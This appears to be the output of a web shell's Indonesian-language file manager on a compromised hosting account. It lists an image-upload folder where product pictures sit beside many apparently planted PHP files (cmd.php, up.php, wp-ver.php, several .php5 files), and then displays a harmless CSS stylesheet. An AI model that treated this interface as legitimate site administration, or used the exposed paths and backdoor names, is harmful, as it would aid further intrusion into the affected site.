/home/u150549505/domains/aiocdpharmaltd.com/public_html/product-cpanel/assets/product-db-image/

Unggah File:


Nama Folder Baru:

123.php  Hapus  Lihat  Edit
Product_0.png  Hapus  Lihat  Edit
Product_1.png  Hapus  Lihat  Edit
Product_10.png  Hapus  Lihat  Edit
Product_101.png  Hapus  Lihat  Edit
Product_102.jpg  Hapus  Lihat  Edit
Product_102.png  Hapus  Lihat  Edit
Product_103.png  Hapus  Lihat  Edit
Product_104.png  Hapus  Lihat  Edit
Product_105.html  Hapus  Lihat  Edit
Product_11.png  Hapus  Lihat  Edit
Product_111.html  Hapus  Lihat  Edit
Product_113.html  Hapus  Lihat  Edit
Product_114.php  Hapus  Lihat  Edit
Product_117.php  Hapus  Lihat  Edit
Product_12.png  Hapus  Lihat  Edit
Product_13.png  Hapus  Lihat  Edit
Product_134.php5  Hapus  Lihat  Edit
Product_135.php  Hapus  Lihat  Edit
Product_136.php5  Hapus  Lihat  Edit
Product_137.php  Hapus  Lihat  Edit
Product_138.php  Hapus  Lihat  Edit
Product_139.php  Hapus  Lihat  Edit
Product_14.png  Hapus  Lihat  Edit
Product_140.php  Hapus  Lihat  Edit
Product_141.php  Hapus  Lihat  Edit
Product_142.php  Hapus  Lihat  Edit
Product_143.php  Hapus  Lihat  Edit
Product_144.php  Hapus  Lihat  Edit
Product_145.php  Hapus  Lihat  Edit
Product_146.php  Hapus  Lihat  Edit
Product_147.php  Hapus  Lihat  Edit
Product_148.php  Hapus  Lihat  Edit
Product_149.php  Hapus  Lihat  Edit
Product_15.png  Hapus  Lihat  Edit
Product_150.php  Hapus  Lihat  Edit
Product_151.php  Hapus  Lihat  Edit
Product_152.php  Hapus  Lihat  Edit
Product_153.php  Hapus  Lihat  Edit
Product_154.php  Hapus  Lihat  Edit
Product_155.php  Hapus  Lihat  Edit
Product_156.php  Hapus  Lihat  Edit
Product_157.php  Hapus  Lihat  Edit
Product_158.php  Hapus  Lihat  Edit
Product_159.php  Hapus  Lihat  Edit
Product_16.png  Hapus  Lihat  Edit
Product_17.jpg  Hapus  Lihat  Edit
Product_17.png  Hapus  Lihat  Edit
Product_18.png  Hapus  Lihat  Edit
Product_19.png  Hapus  Lihat  Edit
Product_2.png  Hapus  Lihat  Edit
Product_20.png  Hapus  Lihat  Edit
Product_21.png  Hapus  Lihat  Edit
Product_22.png  Hapus  Lihat  Edit
Product_23.png  Hapus  Lihat  Edit
Product_24.png  Hapus  Lihat  Edit
Product_25.png  Hapus  Lihat  Edit
Product_26.png  Hapus  Lihat  Edit
Product_27.png  Hapus  Lihat  Edit
Product_28.png  Hapus  Lihat  Edit
Product_29.png  Hapus  Lihat  Edit
Product_3.png  Hapus  Lihat  Edit
Product_30.png  Hapus  Lihat  Edit
Product_31.png  Hapus  Lihat  Edit
Product_32.png  Hapus  Lihat  Edit
Product_33.png  Hapus  Lihat  Edit
Product_34.png  Hapus  Lihat  Edit
Product_35.png  Hapus  Lihat  Edit
Product_36.png  Hapus  Lihat  Edit
Product_37.png  Hapus  Lihat  Edit
Product_38.png  Hapus  Lihat  Edit
Product_39.png  Hapus  Lihat  Edit
Product_4.png  Hapus  Lihat  Edit
Product_40.png  Hapus  Lihat  Edit
Product_41.png  Hapus  Lihat  Edit
Product_42.png  Hapus  Lihat  Edit
Product_43.png  Hapus  Lihat  Edit
Product_44.png  Hapus  Lihat  Edit
Product_45.png  Hapus  Lihat  Edit
Product_46.png  Hapus  Lihat  Edit
Product_47.png  Hapus  Lihat  Edit
Product_48.png  Hapus  Lihat  Edit
Product_49.png  Hapus  Lihat  Edit
Product_5.png  Hapus  Lihat  Edit
Product_50.png  Hapus  Lihat  Edit
Product_51.png  Hapus  Lihat  Edit
Product_52.png  Hapus  Lihat  Edit
Product_53.png  Hapus  Lihat  Edit
Product_54.png  Hapus  Lihat  Edit
Product_55.png  Hapus  Lihat  Edit
Product_56.png  Hapus  Lihat  Edit
Product_57.png  Hapus  Lihat  Edit
Product_58.png  Hapus  Lihat  Edit
Product_59.png  Hapus  Lihat  Edit
Product_6.png  Hapus  Lihat  Edit
Product_60.png  Hapus  Lihat  Edit
Product_61.png  Hapus  Lihat  Edit
Product_62.png  Hapus  Lihat  Edit
Product_63.png  Hapus  Lihat  Edit
Product_64.png  Hapus  Lihat  Edit
Product_65.png  Hapus  Lihat  Edit
Product_66.png  Hapus  Lihat  Edit
Product_67.png  Hapus  Lihat  Edit
Product_68.png  Hapus  Lihat  Edit
Product_69.png  Hapus  Lihat  Edit
Product_7.png  Hapus  Lihat  Edit
Product_70.png  Hapus  Lihat  Edit
Product_71.png  Hapus  Lihat  Edit
Product_72.png  Hapus  Lihat  Edit
Product_73.png  Hapus  Lihat  Edit
Product_74.png  Hapus  Lihat  Edit
Product_75.png  Hapus  Lihat  Edit
Product_76.png  Hapus  Lihat  Edit
Product_77.png  Hapus  Lihat  Edit
Product_78.png  Hapus  Lihat  Edit
Product_79.png  Hapus  Lihat  Edit
Product_8.png  Hapus  Lihat  Edit
Product_80.png  Hapus  Lihat  Edit
Product_81.png  Hapus  Lihat  Edit
Product_82.png  Hapus  Lihat  Edit
Product_83.png  Hapus  Lihat  Edit
Product_84.png  Hapus  Lihat  Edit
Product_85.png  Hapus  Lihat  Edit
Product_86.png  Hapus  Lihat  Edit
Product_87.png  Hapus  Lihat  Edit
Product_88.png  Hapus  Lihat  Edit
Product_89.png  Hapus  Lihat  Edit
Product_9.png  Hapus  Lihat  Edit
Product_90.png  Hapus  Lihat  Edit
Product_91.png  Hapus  Lihat  Edit
Product_92.png  Hapus  Lihat  Edit
Product_96.png  Hapus  Lihat  Edit
Product_97.png  Hapus  Lihat  Edit
Product_98.png  Hapus  Lihat  Edit
Product_99.png  Hapus  Lihat  Edit
a.php  Hapus  Lihat  Edit
al.php  Hapus  Lihat  Edit
cmd.php  Hapus  Lihat  Edit
g.php  Hapus  Lihat  Edit
up.php  Hapus  Lihat  Edit
upl.php  Hapus  Lihat  Edit
wp-ver.php  Hapus  Lihat  Edit

Isi File:

/* CSS Document */
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-image: url(images/bg.png);
background-repeat: repeat-x;
}

#main {
width:1024px;
margin:0 auto;
}
.logo {
margin-top:5px;
float:left;
margin-bottom: 5px;
padding-left: 10px;
}

#search {
margin-top:15px; float:right; margin-bottom: 10px;
}

.search-img {
float:left; margin-top:21px;
}
#search-div {
float:left; margin-top:32px;
}
.search-bg {
background-image:url(images/search.png); background-repeat:repeat-x; height:24px; float:left; padding:5px; border:0px;
}
.float {
float:left;
}
.div-clear {
clear:both;
}
.li {
list-style:none;
padding: 6px;
}
.margin {
margin-top:5px;
margin-bottom: 5px;
}
#pro {
float:left;
width:auto;
text-align:center;
margin:5px;
border: 4px solid #f5f4e9;
}
#logout {
float:left;
width:auto;
text-align:center;
width:90%;
margin-left: 5px;
margin-right: 5px;
margin-bottom: 5px;
}
#pro-2 {
float:left; width:240px; text-align:center; margin:5px;
}
#mid {
padding-top:5px;
}
.box {
float:left;
width:230px;
margin:5px;
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#999999;
}
.box2{
float:left;
width:400px;
margin:5px;
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#FFFFFF;
}
#footer {
padding-top:10px;
margin-bottom:10px;
}
.footer-r {
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#666666;
}
.float-r {
float:right;
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#666666;
}
.intertext {
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#000000;
text-decoration: none;
}
.heading {
color:#FFFFFF;
font-weight:bold;
font-size: 14px;
}
.heading_black{
color:#000000;
font-weight:normal;
font-size: 15px;
}
.padding {
padding:5px;
}
.add {
font-size:20px;
color:#81931D;
font-weight:bold;
}
.sub {
font-size:25px; color:#C01B2C;
}
.login-bg {
float:left;
background-color:#FEFEFE;
padding:10px;
margin-left: 30px;
border: 1px solid #cfcfcf;
width: 350px;
}
.li {

}
.li-space {
padding:5px;
float:left;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#000000;
width: 100px;
}
.sign {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#C01B2C;
text-decoration:none;
text-align: center;
}
.border {
padding:7px;
border-bottom: 1px solid #f5f4e9;
}
#left {
float:left;
width:200px;
}
#cart {
float:right; width:750px;
}
.remove {
border-right:1px solid #ffffff; padding:5px; width:80px; text-align:center;
}
.pro-name {
border-right:1px solid #ffffff; padding:5px; width:350px; text-align:center;
}
.qty {
border-right:1px solid #ffffff; padding:5px; width:80px; text-align:center;
}
.price {
border-right:1px solid #ffffff; padding:5px; width:80px; text-align:center;
}
.total {
padding:5px; width:80px; text-align:center;
}
#sub {
float:right; width:750px; border:1px dotted #999999; background-color:#E1E1E1
}
.nav-text {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:14px;
color:#FFFFFF;
font-weight:normal;
text-decoration:none;
text-transform:uppercase;
}
a.nav-text:hover {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:14px;
color:#FFFFFF;
font-weight:normal;
text-decoration:none;
text-transform:uppercase;
background-color:#7BB81D;
}
.nav-text-roll{
font-family:Georgia, "Times New Roman", Times, serif;
font-size:16px;
color:#FFFFFF;
font-weight:bold;
text-decoration:none;
text-transform:none;
padding: 5px;
}
#active-nav {
background-color:#49751B;
}

.box3 {
float:left;
width:230px;
margin:5px;
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#FFFFFF;
}
.intertext2 {
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#FFFFFF;
text-decoration: none;
}

.intertext2:hover {
padding:5px;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
color:#E3F398;
text-decoration: none;


}





/* add to cart */

.gdv
{
width:100%; border:0px; background-color:#FFFFFF;
}
.gdv_remove
{
width:9%; height:30px; background-color:#EADCA9;
}
.gdv_P_Name
{
width:40%; height:30px; background-color:#EADCA9;
}
.gdv_qty
{
width:17%; height:30px; background-color:#EADCA9;
}
.gdv_Price
{
width:14%; height:30px; background-color:#EADCA9;
}
.gdv_Total
{
width:20%; height:30px; background-color:#EADCA9;
}


/*Bulk Product list*/
.gdv_select
{
width:7%; height:30px; background-color:#EADCA9;
}
.gdv_mat
{
width:25%; height:30px; background-color:#EADCA9;
}
.gdv_composition
{
width:20%; height:30px; background-color:#EADCA9;
}
.gdv_comp
{
width:14%; height:30px; background-color:#EADCA9;
}
.gdv_bprice
{
width:8%; height:30px; background-color:#EADCA9;
}
.gdv_bPack
{
width:13%; height:30px; background-color:#EADCA9;
}